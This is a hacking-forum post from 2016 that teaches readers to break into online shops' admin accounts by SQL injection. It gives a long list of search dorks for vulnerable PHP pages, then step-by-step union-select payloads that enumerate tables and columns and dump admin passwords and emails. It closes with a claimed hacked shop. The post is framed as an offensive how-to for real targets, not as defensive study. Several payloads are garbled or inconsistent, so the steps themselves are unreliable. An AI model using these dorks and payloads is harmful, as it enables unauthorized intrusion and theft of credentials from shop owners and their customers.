01-15-2016, 12:51 PM
Hello All HFR
I just want share my hacking method
To get some of Shop Admin
I just want share my hacking method
To get some of Shop Admin
1. List Of Dork:
Code:
Code:
inurl:IntelexXx .php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:IntelexXx .php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:IntelexXx .php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=2. Find the target, after you find the target. example :
Quote: Wrote:shopadmin/shopping.php?id=
then try to add ' in the end of string, so now it look
Quote: Wrote:shopadmin/IntelexXx .php?id=1'
it should shown error messages on pages. this meaning the shop is vuln, if not get another shop.
3. After you find 1 vuln shop. with above string example. then you need to find list of table on it. you need to add string below, look example:
Quote: Wrote:shopadmin/shopping.php?id=-1 order by 1--
Trial
Quote: Wrote:shopadmin/shopping.php?id=-1 order by 1-- if there were nothing error message shown look likes on number 2 above, then you need to raise number of the possibility.
Look below :
shopadmin/shopping.php?id=-1 order by 1-- increase by 1
shopadmin/shopping.php?id=-1 order by 2--
................................... Until example
shopadmin/shopping.php?id=-1 Order by 17-- (Shown Error)
So, you have get 1st information, that the database has 16 tables on it.
4. We have got info about sum tables on it. next we use string union select , to get 2nd infos
Steps: Look below
Quote: Wrote:shopadmin/shopping.php?id=1
changes to become
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
After that, look the pages, there were shown some numbers, and look the number shown there which has big size that another, example it was '9'
So,
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
change to
Quote: Wrote:shopadmin/shopping.php?id=-1 1,2,3,4,5,6,7,8,9,@@version,10,11,12,13,14,15,16--
You will got 2nd infos, there Are SQL Version that used by the database.
2 Possibily about SQL version, it is Version 4 / 5. For SQL v4 you can inject it using Sql Blind Injection. For SQL v5, You can read this tut below.
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 information_schema.tables where table_schema=database()
Result will show some text infos. Find the infos related "admin" or "users" words. Example you find "users"
Then going to this sites It Is Text to Hex Converter
Why, because we need to convert text to hex code. from word "users" ---> 7573657273
We got 3rd infos, it is hex code 7573657273 (users). Next back to shop and inject like below:
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 information_schema.tables where table_schema=database()
Then change the script with infos above
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(hex code from "users") = table_name=0x7573657273
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--
5. On this section, you will got important infos, like password,email,id etc
Get back to this url :
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--
6. we need to change (table name) look above, to infos we get on step "5", like below.
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(password,0x3a,email,0x3a,id),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--
next to need to re-convert hex code to text form 0x7573657273 --> users
Then it's final step. it looks like.
Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(password,0x3a,email,0x3a,id),10,11,12,13,14,15,16 from users--
You will get user + password some admin of those shop.
All you need now, looking around and find Shopadmin Login Pages On it
hisha_goza:This my Example Hacked Shop
Albania - Kosovo












